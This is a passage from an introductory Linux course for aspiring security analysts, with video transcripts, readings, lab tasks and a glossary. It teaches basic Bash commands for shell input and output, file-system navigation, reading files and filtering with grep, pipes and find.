of characters. In our example, we'll just have it output the string of: hello. So, as input, we'll type:
echo
hello into the shell. Later, when we press enter,
we'll get the output. But before we do that, let's first discuss the concept
of output in more detail. Standard output is
the information returned by the OS
through the shell. In the same way that your friend gives an answer
to your question, output is a computer's response
to the command you input. Output is what you receive. Let's pick up where we left
off in our example and send the input of: echo hello to
the OS by pressing enter. Immediately, the shell
returns the output of: hello. Finally, standard error contains error messages returned by
the OS through the shell. Just like your friend might indicate that they can't
answer a question, the system responds with an error message if they can't
respond to your command. Sometimes this might occur when we misspell a command or the
system doesn't know the response to the command. Other times, it might happen
because we don't have the appropriate permissions to perform a command. We'll explore another
example that demonstrates standard error. Let's input: eco hello into the shell. Notice I
intentionally misspelled echo as e-c-o. When we press enter, an error message appears. To wrap up,
we've covered the basics of communication with the shell. Communication with the shell can only
go in one of three ways: the system receives a command—this is input; the system responds to the
command and produces output; and finally, the system doesn't know how to respond, resulting in
an error. Later, you'll become much more familiar with this as we explore commands useful for
security professionals.
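The three streams described in this video can be observed directly in Bash. This sketch reuses the deliberate misspelling from the example above (eco instead of echo) and redirects the error stream to a file, making the difference between standard output and standard error visible:

```shell
# Standard output: the shell returns the string passed to echo.
echo hello

# Standard error: a misspelled command name produces a message on the
# error stream (file descriptor 2), not on standard output. The exact
# wording varies by system, e.g. "eco: command not found".
eco hello 2> error.txt || true   # "|| true" lets the script continue

# The error message was captured in error.txt instead of being
# printed as normal output.
cat error.txt
```

This separation is what lets you, for example, save a command's results to one file while logging its errors to another.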
Activity: Examine input and output in the shell
Introduction
In this lab, you’ll use the echo command to examine how input is received and how output is returned in
the shell. You’ll also use other Linux commands in the Bash shell to explore more about input and output
and other basic functions of the shell.
What you’ll do
You have multiple tasks in this lab:
● Generate output in the shell with the echo command
● Perform basic calculations with the expr command
● Clear the shell window with the clear command
● Explore the commands further
Activity overview
Previously, you discussed how the Bash shell helps you communicate with a computer’s
operating system.
When you communicate with the shell, the commands in the shell can take input and return
output or error messages.
In this lab activity, you’ll use the echo command to examine how input is received and how
output is returned in the shell. Next, you’ll use the expr command to further explore input
and output while performing some basic calculations in the shell.
This activity will build foundations in understanding how you communicate with the Linux
operating system through the shell. As a security analyst, you'll need to input commands
into the shell and recognize when the shell returns either output or an error message.
Next, you'll explore the scenario!
Scenario
As a security professional, it’s important to understand the concept of communicating with
your computer via the shell.
In this scenario, you have to input a specified string of text that you want the shell to return
as output. You'll also need to input a few mathematical calculations so the OS (operating
system) can return the result.
Here’s how you’ll do this: First, you’ll use the echo command to generate some output in the
shell. Second, you’ll use the expr command to perform basic mathematical
calculations. Next, you’ll use the clear command to clear the Bash shell window. Finally,
you’ll have an opportunity to explore the echo and expr commands further.
Get ready to examine input and output in the Bash shell.
Start your lab
Before you begin, you can review the instructions for using the Qwiklabs platform under
the Resources tab in Coursera.
If you haven't already done so, click Start Lab. This brings up the terminal so that you can
begin completing the tasks!
When you have completed all the tasks, refer to the End your Lab section that follows the
tasks for information on how to end your lab.
Task 1. Generate output with the echo command
The echo command in the Bash shell outputs a specified string of text. In this task, you’ll use
the echo command to generate output in the Bash shell.
1. Type echo hello into the shell and press ENTER.
The hello string should be returned:
hello
The command echo hello is the input to the shell, and hello is the output from the shell.
2. Rerun the command, but include quotation marks around the string data. Type echo
"hello" into the shell and press ENTER.
The hello string should be returned again:
hello
Note: The output is the same as before. The quotation marks are optional in this case, but they tell
the shell to group a series of characters together. This can be useful if you need to pass a string that
contains certain characters that might be otherwise misinterpreted by the command.
3. Use the echo command to output your name to the shell.
Type echo "name" into the shell, replacing "name" with your own name, and press ENTER.
The name you’ve entered as the string should return as the output.
Click Check my progress to verify that you have completed this task correctly.
Generate output with the echo command
Task 2. Generate output with the expr command
In this task, you’ll use the expr command to generate some additional output in the Bash
shell. The expr command performs basic mathematical calculations and can be useful when
you need to quickly perform a calculation.
Imagine that the system has shown you that you have 32 alerts, but only 8 required action.
You want to calculate how many alerts are false positives so that you can provide feedback
to the team that configures the alerts.
To do this, you need to subtract the number of alerts that required action from the total
number of alerts.
1. Calculate the number of false positives using the expr command.
Type expr 32 - 8 into the shell and press ENTER.
The following result should be returned:
24
Note: The expr command requires that all terms and operators in an expression are separated by
spaces. For example: expr 32 - 8, and not expr 32-8.
Now, you need to calculate the average number of login attempts that are expected over the
course of a year. From the information you have, you know that an average of 3500 login
attempts have been made each month so far this year.
So, you should be able to calculate the total number of logins expected in a year by
multiplying 3500 by 12.
2. Type expr 3500 \* 12 into the shell and press ENTER.
Note: The asterisk (*) must be escaped with a backslash (\*). This prevents the shell from
expanding it as a wildcard character before it reaches the expr command.
The correct result should now be returned:
42000
Click Check my progress to verify that you have completed this task correctly.
Generate output with the expr command
Task 3. Clear the Bash shell
In this task, you’ll use the clear command to clear the Bash shell of all existing output. This
allows you to start with the cursor at the top of the Bash shell window.
When you work in a shell environment, the screen can fill with previous input and output
data. This can make it difficult to process what you’re working on. Clearing the screen
allows you to create a clutter-free text environment to allow you to focus on what is
important at that point in time.
● Type clear into the shell and press ENTER.
Note: All previous commands and output will be cleared, and the user prompt and cursor will
return to the upper left of the shell window.
Click Check my progress to verify that you have completed this task correctly.
Clear the Bash shell
Optional task: Perform more calculations with
the expr command
You have the opportunity to explore input and output further using
the echo and expr commands.
1. Generate at least one new output using the echo command.
(Remember the echo "hello" output you generated).
2. Perform at least one new calculation using the expr command.
The mathematical operators you can use with the expr command for adding, subtracting,
dividing, and multiplying are +, -, /, and * (escaped as \* in the shell).
Note: The expr command performs integer mathematical calculations only, so you cannot use the
decimal point or expect a fractional result. All results are rounded down to the nearest integer. Also,
all terms and operators in an expression need to be separated by spaces. For example: expr 25 +
15, and not expr 25+15.
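The notes above about spacing, escaping, and integer-only results can all be checked directly in the shell. A short sketch:

```shell
expr 25 + 15     # addition: prints 40
expr 32 - 8      # subtraction: prints 24
expr 3500 \* 12  # multiplication: the * is escaped so the shell
                 # doesn't expand it as a wildcard; prints 42000
expr 7 / 2       # integer division: the result is rounded down,
                 # so this prints 3, not 3.5
```

Each term and operator is separated by spaces, as the Note requires; expr 25+15 would be treated as a single string rather than a calculation.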
Conclusion
Great work!
You now have practical experience in using basic Linux Bash shell commands to:
● generate output with the echo command,
● generate output with the expr command, and
● clear the Bash shell with the clear command.
Understanding input and output is essential when communicating through the shell. It’s
important that you’re comfortable with these basic concepts before you go on to work with
additional commands.
Glossary terms from module 2
Terms and definitions from Course 4, Module 2
Application: A program that performs a specific task
Bash: The default shell in most Linux distributions
CentOS: An open-source distribution that is closely related to Red Hat
Central Processing Unit (CPU): A computer’s main processor, which is used to perform general
computing tasks on a computer
Command: An instruction telling the computer to do something
Digital forensics: The practice of collecting and analyzing data to determine what has happened after an
attack
Directory: A file that organizes where other files are stored
Distributions: The different versions of Linux
File path: The location of a file or directory
Filesystem Hierarchy Standard (FHS): The component of the Linux OS that organizes data
Graphical user interface (GUI): A user interface that uses icons on the screen to manage different tasks
on the computer
Hard drive: A hardware component used for long-term memory
Hardware: The physical components of a computer
Internal hardware: The components required to run the computer
Kali Linux ™: An open-source distribution of Linux that is widely used in the security industry
Kernel: The component of the Linux OS that manages processes and memory
Linux: An open source operating system
Package: A piece of software that can be combined with other packages to form an application
Package manager: A tool that helps users install, manage, and remove packages or applications
Parrot: An open-source distribution that is commonly used for security
Penetration test (pen test): A simulated attack that helps identify vulnerabilities in systems, networks,
websites, applications, and processes
Peripheral devices: Hardware components that are attached and controlled by the computer system
Random Access Memory (RAM): A hardware component used for short-term memory
Red Hat® Enterprise Linux® (also referred to simply as Red Hat in this course): A subscription-based
distribution of Linux built for enterprise use
Shell: The command-line interpreter
Standard error: An error message returned by the OS through the shell
Standard input: Information received by the OS via the command line
Standard output: Information returned by the OS through the shell
String data: Data consisting of an ordered sequence of characters
Ubuntu: An open-source, user-friendly distribution that is widely used in security and other industries
User: The person interacting with a computer
Module 3 – Navigate the Linux File System
Welcome back. Before we get into specific Linux commands, let's explore in more
detail the basics of communicating with the OS through the shell. Being able to utilize
Linux commands is a foundational skill for all security professionals. As a security analyst,
you will work with server logs and you'll need to know how to navigate, manage and analyze files
remotely without a graphical user interface. In addition, you'll need to know how to verify and
configure users and group access. You'll also need to give authorization and set file permissions.
That means that developing skills with the command line is essential for your work
as a security analyst. When we learned about the Linux architecture, we learned that the shell is one
of the main components of an operating system. We also learned that there are different shells. In
this section, we'll utilize the Bash shell. Bash is the default shell in most Linux distributions. For the
most part, the key Linux commands that you'll be learning in this section are the same across shells.
Now that you know what shell you'll be using, let's go into how to write in Bash. As we discussed in
a previous section, communicating with your OS is like a conversation. You type in commands, and
the OS responds with an answer to your command. A command is an instruction telling the
computer to do something. We'll try out a command in Bash. Notice a dollar sign before the cursor.
This is your prompt to enter a new command. Some commands might tell the computer to find
something like a specific file. Others might tell it
to launch a program. Or, it might be to output a specific string of text. In the last section, when we
discussed input and output, we explored how the echo command did this. Let's input the
echo command again. You may notice that the command we just input is not complete. If we're
going to use the echo command to output a specific string of text, we need to specify what the
string of text is. This is what arguments are for. An argument is specific information needed by a
command. Some commands take multiple arguments. So now let's complete the echo
command with an argument. We're learning some pretty technical stuff, so how about we output
the words: "You are doing great!" We'll add this argument, and then we'll press enter
to get the output. In this example, our argument was a string of text. Arguments can provide other
types of information as well. One thing that is really
important in Linux is that all commands and arguments
are case sensitive. This includes file and directory names. Keep that in mind as you
learn more about how to use Linux in your day-to-day tasks as a security analyst. Okay, now that
we've covered the basics of entering Linux commands and arguments through the Bash
shell, we're ready to learn some specific commands.
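The command-and-argument pattern from this video can be tried at the Bash prompt. Here, echo is the command and the quoted sentence is its argument; the quotation marks group the whole sentence into a single argument:

```shell
# echo is the command; the quoted string is its argument.
echo "You are doing great!"

# Remember that commands and arguments are case sensitive:
# ECHO would not be recognized as the echo command.
```

The shell passes the argument to the command, and the command's output is returned to you through the shell.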
I hope you're learning a lot about how to communicate with the Linux OS. As we continue our
journey into utilizing the Linux command line, we'll focus on how to navigate the Linux file system.
Now, I want you to imagine a tree. What did you notice first about the tree? Would you say the
trunk or the branches? These might definitely get your attention, but what about its roots?
Everything about a tree starts in the roots. Something similar happens when we think about the
Linux file system. Previously, we learned about the components of the Linux architecture. The
Filesystem Hierarchy Standard, or FHS, is the component of the Linux OS that organizes data. This
file system is a very important part of Linux because everything we do in Linux is considered a file
somewhere in the system's directory. The FHS is a hierarchical system, and just like with a tree,
everything grows and branches out from the root. The root directory is the highest-level directory
in Linux. It's designated by a single slash. Subdirectories branch off from the root directory. The
subdirectories branch out further and further away from the root directory. When describing the
directory structure in Linux, slashes are used when tracing back through these branches to the root.
For example, here, the first slash indicates
the root directory. Then it branches out a level into the home subdirectory. Another slash indicates
it is branching out again. This time it's to the analyst subdirectory that is located within home.
When working in security, it is essential that you learn to navigate the file system to locate and
analyze log files. You'll analyze these log files for application usage and authentication.
With that background, we're now ready to learn the commands commonly used for navigating the
file system. First, pwd prints the working directory onto the screen. When you use this command,
the output tells you which directory you're currently in. Next, ls displays the names of files and
directories in the current working directory. And finally, cd navigates between directories. This is the
command you'll use when you want to change directories. Let's use these commands in Bash. First,
we'll type the command pwd to display the current location and then press enter. The output is the
path to the analyst directory where we're currently working. Next, let's input ls to display the files
and directories within the analyst directory. The output is the names of four directories: logs,
oldreports, projects, and reports, plus one file named updates.txt. So let's say we now want to go into
the logs directory to check for unauthorized access. We'll input: cd logs to change directories. We
won't get any output on the screen from the cd command, but if we enter pwd again, its output
indicates that the working directory is logs. Logs is a subdirectory of the analyst directory. As a
security analyst, you'll also need to know how to read file content in Linux. For example, you may
need to read files that contain configuration settings to identify potential vulnerabilities. Or, you
might look at user access reports while investigating unauthorized access. When reading file
content, there are some commands that will help you. First, cat displays the content of a file. This is
useful, but sometimes you won't want the full contents of a large file. In these cases, you can use the
head command. It displays just the beginning of a file, by default ten lines. Let's try out these
commands. Imagine that we want to read the contents of access.txt, and we're already in the
working directory where it's located. First, we input the cat command and then follow it with
the name of the file, access.txt. And Bash returns the full contents of this file. Let's compare that
to the head command. When we input the head command followed by our file name, only the first
10 lines of this file are displayed. Wow, this section had lots of action, and it's just the beginning! I'm
glad you learned how security analysts can use essential commands to
navigate the system. Next, we'll explore how to manage the system.
Navigate Linux and read file content
In this reading, you’ll review how to navigate the file system using Linux commands in Bash. You’ll
further explore the organization of the Linux Filesystem Hierarchy Standard, review several common
Linux commands for navigation and reading file content, and learn a couple of new commands.
Filesystem Hierarchy Standard (FHS)
Previously, you learned that the Filesystem Hierarchy Standard (FHS) is the component of Linux that
organizes data. The FHS is important because it defines how directories, directory contents, and other
storage is organized in the operating system.
This diagram illustrates the hierarchy of relationships under the FHS:
Under the FHS, a file’s location can be described by a file path. A file path is the location of a file or
directory. In the file path, the different levels of the hierarchy are separated by a forward slash (/).
Root directory
The root directory is the highest-level directory in Linux, and it’s always represented with a forward
slash (/). All subdirectories branch off the root directory. Subdirectories can continue branching out to
as many levels as necessary.
Standard FHS directories
Directly below the root directory, you’ll find standard FHS directories. In the diagram, home, bin, and etc
are standard FHS directories. Here are a few examples of what standard directories contain:
● /home: Each user in the system gets their own home directory.
● /bin: This directory stands for “binary” and contains binary files and other executables.
Executables are files that contain a series of commands a computer needs to follow to run
programs and perform other functions.
● /etc: This directory stores the system’s configuration files.
● /tmp: This directory stores many temporary files. The /tmp directory is commonly used by
attackers because anyone in the system can modify data in these files.
● /mnt: This directory stands for “mount” and stores media, such as USB drives and hard drives.
Pro Tip: You can use the man hier command to learn more about the FHS and its standard directories.
User-specific subdirectories
Under home are subdirectories for specific users. In the diagram, these users are analyst and analyst2.
Each user has their own personal subdirectories, such as projects, logs, or reports.
Note: When the path leads to a subdirectory below the user’s home directory, the user’s home directory
can be represented as the tilde (~). For example, /home/analyst/logs can also be represented as ~/logs.
You can navigate to specific subdirectories using their absolute or relative file paths. The absolute file
path is the full file path, which starts from the root. For example, /home/analyst/projects is an absolute
file path. The relative file path is the file path that starts from a user's current directory.
Note: Relative file paths can use a dot (.) to represent the current directory, or two dots (..) to represent
the parent of the current directory. An example of a relative file path could be ../projects.
Key commands for navigating the file system
The following Linux commands can be used to navigate the file system: pwd, ls, and cd.
pwd
The pwd command prints the working directory to the screen. Or in other words, it returns the directory
that you’re currently in.
The output gives you the absolute path to this directory. For example, if you’re in your home directory
and your username is analyst, entering pwd returns /home/analyst.
Pro Tip: To learn what your username is, use the whoami command. The whoami command returns the
username of the current user. For example, if your username is analyst, entering whoami returns analyst.
ls
The ls command displays the names of the files and directories in the current working directory. For
example, in the video, ls returned directories such as logs, and a file called updates.txt.
Note: If you want to return the contents of a directory that’s not your current working directory, you can
add an argument after ls with the absolute or relative file path to the desired directory. For example, if
you’re in the /home/analyst directory but want to list the contents of its projects subdirectory, you can
enter ls /home/analyst/projects or just ls projects.
cd
The cd command navigates between directories. When you need to change directories, you should use
this command.
To navigate to a subdirectory of the current directory, you can add an argument after cd with the
subdirectory name. For example, if you’re in the /home/analyst directory and want to navigate to its
projects subdirectory, you can enter cd projects.
You can also navigate to any specific directory by entering the absolute file path. For example, if you’re
in /home/analyst/projects, entering cd /home/analyst/logs changes your current directory to
/home/analyst/logs.
Pro Tip: You can use the relative file path and enter cd .. to go up one level in the file structure. For
example, if the current directory is /home/analyst/projects, entering cd .. would change your working
directory to /home/analyst.
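The pwd, ls, and cd commands can be practiced together in a scratch directory. Here's a minimal sketch, assuming a Bash shell; the sandbox path and its subdirectory names are hypothetical stand-ins for the /home/analyst examples above:

```shell
# Build a small practice tree in a temporary directory, then
# navigate it with pwd, ls, and cd. The directory names mirror
# the reading's examples but are created fresh here.
sandbox="$(mktemp -d)"            # hypothetical stand-in for /home/analyst
mkdir -p "$sandbox/logs" "$sandbox/projects" "$sandbox/reports"
touch "$sandbox/updates.txt"

cd "$sandbox"
pwd                               # prints the absolute path of the sandbox
ls                                # logs  projects  reports  updates.txt

cd logs                           # relative path into the logs subdirectory
pwd                               # the output now ends in /logs
cd ..                             # relative path back up to the parent
pwd                               # back at the sandbox root
```

Note that cd produces no output on success; running pwd after each cd is a quick way to confirm where you landed.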
Common commands for reading file content
The following Linux commands are useful for reading file content: cat, head, tail, and less.
cat
The cat command displays the content of a file. For example, entering cat updates.txt returns everything
in the updates.txt file.
head
The head command displays just the beginning of a file, by default 10 lines. The head command can be
useful when you want to know the basic contents of a file but don’t need the full contents. Entering head
updates.txt returns only the first 10 lines of the updates.txt file.
Pro Tip: If you want to change the number of lines returned by head, you can specify the number of lines
by including -n. For example, if you only want to display the first five lines of the updates.txt file, enter
head -n 5 updates.txt.
tail
The tail command does the opposite of head. This command can be used to display just the end of a file,
by default 10 lines. Entering tail updates.txt returns only the last 10 lines of the updates.txt file.
Pro Tip: You can use tail to read the most recent information in a log file.
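One way to see cat, head, and tail side by side is to generate a numbered file and read it back. This is a sketch assuming a Bash shell with the seq utility; the file name updates.txt follows the reading, but its contents are invented:

```shell
# Create a 20-line demo file, then read it three different ways.
demo="$(mktemp -d)"
seq -f "update line %g" 20 > "$demo/updates.txt"

cat "$demo/updates.txt"           # full contents: all 20 lines
head "$demo/updates.txt"          # first 10 lines (the default)
head -n 5 "$demo/updates.txt"     # first 5 lines only
tail "$demo/updates.txt"          # last 10 lines (the default)
tail -n 2 "$demo/updates.txt"     # last 2 lines, e.g. the newest entries
```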
less
The less command returns the content of a file one page at a time. For example, entering less updates.txt
changes the terminal window to display the contents of updates.txt one page at a time. This allows you to
easily move forward and backward through the content.
Once you’ve accessed your content with the less command, you can use several keyboard controls to
move through the file:
● Space bar: Move forward one page
● b: Move back one page
● Down arrow: Move forward one line
● Up arrow: Move back one line
● q: Quit and return to the previous terminal window
Key takeaways
It’s important for security analysts to be able to navigate Linux and the file system of the FHS. Some key
commands for navigating the file system include pwd, ls, and cd. Reading file content is also an important
skill in the security profession. This can be done with commands such as cat, head, tail, and less.
Activity: Find files with Linux commands
Introduction
In this lab, you’ll learn how to navigate a Linux file structure, locate files, and read file contents.
You’ll use Linux commands in the Bash shell to complete these steps.
What you’ll do
You have multiple tasks in this lab:
● Find your current working directory and display its contents
● Navigate to a directory and list subdirectories
● Display the contents of a file
● Display the first 10 lines of a file
Scenario
In this scenario, you have to locate and analyze the information of certain files located in
the /home/analyst directory.
Here’s how you’ll do this: First, you’ll get the information of the current working directory
you’re in and display the contents of the directory. Second, you’ll navigate to
the reports directory and list the subdirectories it contains. Third, you’ll navigate to
the users subdirectory and display the contents of the Q1_added_users.txt file. Finally, you’ll
navigate to the logs directory and display the first 10 lines of a file it contains.
To complete these tasks, you'll need to use commands that you've previously learned in
this course. Well, it's time to practice what you’ve learned. Let’s do this!
Note: The lab starts with your user account, called analyst, already logged in to the Bash shell. This
means you can start with the tasks as soon as you click the Start Lab button.
Start your lab
Before you begin, you can review the instructions for using the Qwiklabs platform under
the Resources tab in Coursera.
If you haven't already done so, click Start Lab. This brings up the terminal so that you can
begin completing the tasks!
When you have completed all the tasks, refer to the End your Lab section that follows the
tasks for information on how to end your lab.
Task 1. Get the current directory information
In this task, you must use the commands you learned about to check the current working
directory and list its contents.
1. Display your working directory.
2. Display the names of the files and directories in the current working directory.
Task 2. Change directory and list the subdirectories
In this task, you must navigate to a new directory and determine the subdirectories it
contains.
1. Navigate to the /home/analyst/reports directory.
2. Display the files and subdirectories in the /home/analyst/reports directory.
Task 3. Navigate to a directory and read the contents of a file
In this task, you must navigate to a subdirectory and read the contents of a file it contains.
1. Navigate to the /home/analyst/reports/users directory.
2. List the files in the current directory.
3. Display the contents of the Q1_added_users.txt file.
What department does the employee with the username aezra work in?
Task 4. Navigate to a directory and locate a file
In this task, you must navigate to a new directory, locate a file, and examine the contents of
the file.
1. Navigate to the /home/analyst/logs directory.
2. Display the name of the file it contains.
3. Display the first 10 lines of this file.
How many warning messages are in the first 10 lines of the server_logs.txt file?
● Two
● One
● Six
● Three
Conclusion
Great work!
You now have practical experience in using basic Linux Bash shell commands to
● navigate directory structures with the cd command,
● display the current working directory with the pwd command,
● list the contents of a directory with the ls command, and
● display the contents of files with the cat and head commands.
Navigating through directories and reading file contents are fundamental skills that you’ll
often use when communicating through the shell.
Find what you need in Linux
Now that we've covered pwd, ls, and cd and are familiar with these basic commands for navigating the Linux file system, let's look at a couple of ways to find what you need within this system. As a security analyst, your work will likely involve filtering for the information you need. Filtering means searching your system for specific information that can help you solve complex problems. For example, imagine that your team determines a piece of malware contains a string of characters. You might be tasked with finding other files with the same string to determine if those files contain the same malware. Later, we'll learn more about how you can use SQL to filter a database, but Linux is a good place to start basic filtering.
First, we'll start with grep. The grep command searches a specified file and returns all lines in the file containing a specified string. Here's an example of this. Let's say we have a file called updates.txt, and we're currently looking for lines that contain the word OS. If the file is large, it would take a long time to visually scan for this. Instead, after navigating to the directory that contains updates.txt, we'll type the command grep OS updates.txt into the shell. Notice how the grep command is followed by two arguments. The first argument is the string we're searching for; in this case, OS. The second argument is the name of the file we're searching through, updates.txt. When we press enter, Bash returns all lines containing the word OS.
Now let's talk about piping. Piping is a Linux command that can be used for a variety of purposes. In a moment, we'll focus on how it can be used for filtering. But first, let's talk about the general idea of piping. The pipe command sends the standard output of one command as standard input into another command for further processing. It's represented by the vertical bar character. In our context, we can refer to this as the pipe character. Take a moment and imagine a physical pipe. Physical pipes have two ends. On one end, for example, water might enter the pipe from a hot water tank. Then, it travels through the pipe and comes out on the other end in a sink. Similarly, in Linux, piping also involves redirection. Output from one command is sent through the pipe and then is used on the other side of the pipe.
Earlier in this video, I explained how grep can be used to filter for strings of characters within a file. Grep can also be incorporated after a pipe. Let's focus on this example. The first command, ls, instructs the operating system to output the file and directory contents of the reports subdirectory. But because the command is followed by the pipe, the output isn't returned to the screen. Instead, it's sent to the next command. As we just learned, grep searches for a specified string of characters; in this case, it's users. But where is it searching? Since grep follows a pipe, the output of the previous command indicates where to search. In this case, that output is a list of files and directories within the reports subdirectory. It will return all files and directories that contain the word users.
Let's explore this in Bash. So we can better understand how the filter works, let's first output everything in the reports directory. If we were already in the directory, we would just need to input ls. But since we're not, we'll also specify the path to this directory. When we press enter, the output indicates there are seven files in the reports directory. Because we want to return only the files that contain the word users, we'll combine this ls command with piping and the grep command. As the output demonstrates, Linux has been instructed to return only files that contain the word users. The two files that don't contain this string no longer appear. So now you have two different ways that you can filter in Linux while working as an analyst. Navigating through files and filtering are just part of what you need to know. Let's keep exploring the Linux command line.
Filter content in Linux
In this reading, you’ll continue exploring Linux commands, which can help you filter for the information
you need. You’ll learn a new Linux command, find, which can help you search files and directories for
specific information.
Filtering for information
You previously explored how filtering for information is an important skill for security analysts. Filtering
is selecting data that match a certain condition. For example, if you had a virus in your system that only
affected the .txt files, you could use filtering to find these files quickly. Filtering allows you to search
based on specific criteria, such as file extension or a string of text.
grep
The grep command searches a specified file and returns all lines in the file containing a specified string.
The grep command commonly takes two arguments: a specific string to search for and a specific file to
search through.
For example, entering grep OS updates.txt returns all lines containing OS in the updates.txt file. In this
example, OS is the specific string to search for, and updates.txt is the specific file to search through.
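A quick way to see grep's two arguments in action is with a throwaway file. A sketch, assuming a Bash shell; the line contents here are made up for the example:

```shell
# Create an updates.txt containing three lines, then filter for "OS".
work="$(mktemp -d)"
printf '%s\n' \
  "OS patch applied" \
  "email client updated" \
  "OS reboot scheduled" > "$work/updates.txt"

grep OS "$work/updates.txt"       # returns the two lines containing OS
grep -i os "$work/updates.txt"    # -i makes the match case-insensitive
```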
Piping
The pipe command is accessed using the pipe character (|). Piping sends the standard output of one
command as standard input to another command for further processing. As a reminder, standard output
is information returned by the OS through the shell, and standard input is information received by the
OS via the command line.
The pipe character (|) is located in various places on a keyboard. On many keyboards, it’s located on the
same key as the backslash character (\). On some keyboards, the | can look different and have a small
space through the middle of the line. If you can’t find the |, search online for its location on your
particular keyboard.
When used with grep, the pipe can help you find directories and files containing a specific word in their
names. For example, ls /home/analyst/reports | grep users returns the file and directory names in the
reports directory that contain users. Before the pipe, ls indicates to list the names of the files and
directories in reports. Then, it sends this output to the command after the pipe. In this case, grep users
returns all of the file or directory names containing users from the input it received.
Note: Piping is a general form of redirection in Linux and can be used for multiple tasks other than
filtering. You can think of piping as a general tool that you can use whenever you want the output of one
command to become the input of another command.
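The ls-into-grep pattern can be reproduced in a scratch directory. This sketch assumes a Bash shell; the file names are invented to echo the reports example:

```shell
# Three files, only two of which contain "users" in their names.
reports="$(mktemp -d)"
touch "$reports/Q1_added_users.txt" \
      "$reports/Q1_deleted_users.txt" \
      "$reports/annual_summary.txt"

ls "$reports"                       # lists all three file names
ls "$reports" | grep users          # keeps only names containing "users"
ls "$reports" | grep users | wc -l  # pipes chain: count the matches
```

Because the pipe hands ls's output to grep as input, grep here filters file names rather than file contents.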
find
The find command searches for directories and files that meet specified criteria. There’s a wide range of
criteria that can be specified with find. For example, you can search for files and directories that
● Contain a specific string in the name,
● Are a certain file size, or
● Were last modified within a certain time frame.
When using find, the first argument after find indicates where to start searching. For example, entering
find /home/analyst/projects searches for everything starting at the projects directory.
After this first argument, you need to indicate your criteria for the search. If you don’t include a specific
search criteria with your second argument, your search will likely return a lot of directories and files.
Specifying criteria involves options. Options modify the behavior of a command and commonly begin
with a hyphen (-).
-name and -iname
One key criteria analysts might use with find is to find file or directory names that contain a specific
string. The specific string you’re searching for must be entered in quotes after the -name or -iname
options. The difference between these two options is that -name is case-sensitive, and -iname is not.
For example, you might want to find all files in the projects directory that contain the word “log” in the
file name. To do this, you’d enter find /home/analyst/projects -name "*log*". You could also enter find
/home/analyst/projects -iname "*log*".
In these examples, the output would be all files in the projects directory that contain log surrounded by
zero or more characters. The "*log*" portion of the command is the search criteria that indicates to
search for the string “log”. When -name is the option, files with names that include Log or LOG, for
example, wouldn’t be returned because this option is case-sensitive. However, they would be returned
when -iname is the option.
Note: An asterisk (*) is used as a wildcard to represent zero or more unknown characters.
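The case-sensitivity difference is easy to demonstrate with file names that differ only in case. A sketch, assuming a Bash shell; the file names are hypothetical:

```shell
# One lowercase "log" name, one uppercase "LOG" name, one without either.
projects="$(mktemp -d)"
touch "$projects/access_log.txt" "$projects/Server_LOG.txt" "$projects/notes.txt"

find "$projects" -name "*log*"    # case-sensitive: matches access_log.txt only
find "$projects" -iname "*log*"   # case-insensitive: matches both log files
```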
-mtime
Security analysts might also use find to find files or directories last modified within a certain time frame.
The -mtime option can be used for this search. For example, entering find /home/analyst/projects -mtime -3
returns all files and directories in the projects directory that have been modified within the past three
days.
The -mtime option search is based on days, so entering -mtime +1 indicates all files or directories last
modified more than one day ago, and entering -mtime -1 indicates all files or directories last modified
less than one day ago.
Note: The option -mmin can be used instead of -mtime if you want to base the search on minutes rather
than days.
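To try -mtime without waiting days, you can backdate a file's modification time. This sketch assumes GNU touch (the -d option is a GNU coreutils feature); on other systems, touch -t with an explicit timestamp works similarly:

```shell
# One file modified now, one backdated five days.
recent="$(mktemp -d)"
touch "$recent/today.txt"
touch -d "5 days ago" "$recent/last_week.txt"   # GNU coreutils option

find "$recent" -type f -mtime -3  # modified less than 3 days ago: today.txt
find "$recent" -type f -mtime +3  # modified more than 3 days ago: last_week.txt
```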
Filtering for information using Linux commands is an important skill for security analysts so that they
can customize data to fit their needs. Three key Linux commands for this are grep, piping (|), and find.
These commands can be used to navigate and filter for information in the file system.
Activity: Filter with grep
Activity overview
Previously, you learned about tools that you can use to filter information in Linux. You’re
also familiar with the basic commands to navigate the Linux file system by now.
In this lab activity, you’ll use the grep command and piping to search for files and to return
specific information from files.
As a security analyst, it’s key to know how to find the information you need. The ability to
search for specific strings can help you locate what you need more efficiently.
Scenario
In this scenario, you need to obtain information contained in server log and user data files.
You also need to find files with specific names.
Here’s how you’ll do this: First, you’ll navigate to the logs directory and return the error
messages in the server_logs.txt file. Next, you’ll navigate to the users directory and search
for files that contain a specific string in their names. Finally, you’ll search for information
contained in user files.
With that in mind, you’re ready to practice what you've learned.
Note: The lab starts with your user account, called analyst, already logged in to a Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
Task 1. Search for error messages in a log file
In this task, you must navigate to the /home/analyst/logs directory and report on the error
messages in the server_logs.txt file. You’ll do this by using grep to search the file and output
only the entries that are for errors.
1. Navigate to the /home/analyst/logs directory.
2. Use grep to filter the server_logs.txt file, and return all lines containing the text
string error.
Note: If you enter a command incorrectly and it fails to return to the command-line prompt,
you can press CTRL+C to stop the process and force the shell to return to the command-line prompt.
Task 2. Find files containing specific strings
In this task, you must navigate to the /home/analyst/reports/users directory and use the
correct Linux commands and arguments to search for user data files that contain a specific
string in their names.
1. Navigate to the /home/analyst/reports/users directory.
2. Using the pipe character (|), pipe the output of the ls command to the grep command
to list only the files containing the string Q1 in their names.
Task 3. Search more file contents
In this task, you must search for information contained in user files and report on users
that were added and deleted from the system.
1. Display the files in the /home/analyst/reports/users directory.
2. Search the Q2_deleted_users.txt file for the username jhill.
3. Search the Q4_added_users.txt file to list the users who were added to the Human
Resources department.
Create and modify directories and files
Let's make some branches! What do I mean by that? Well, in a previous video, we discussed root directories and how other subdirectories branch off of the root directory. Let's think again about the file directory system as a tree. The subdirectories are the branches of the tree. They're all connected from the same root but can grow to make a complex tree. In this video, we'll create directories and files and learn how to modify them. When it comes to working with data in security, organization is key. If we know where information is located, it makes it easier to detect issues and keep information safe. In a previous video, we already discussed navigating between directories, but let's take a moment to examine directories more closely. It's possible you're familiar with the concept of folders for organizing information. In Linux, we have directories. Directories help organize files and subdirectories. For example, within a directory for reports, an analyst may need to create two subdirectories: one for drafts and one for final reports.
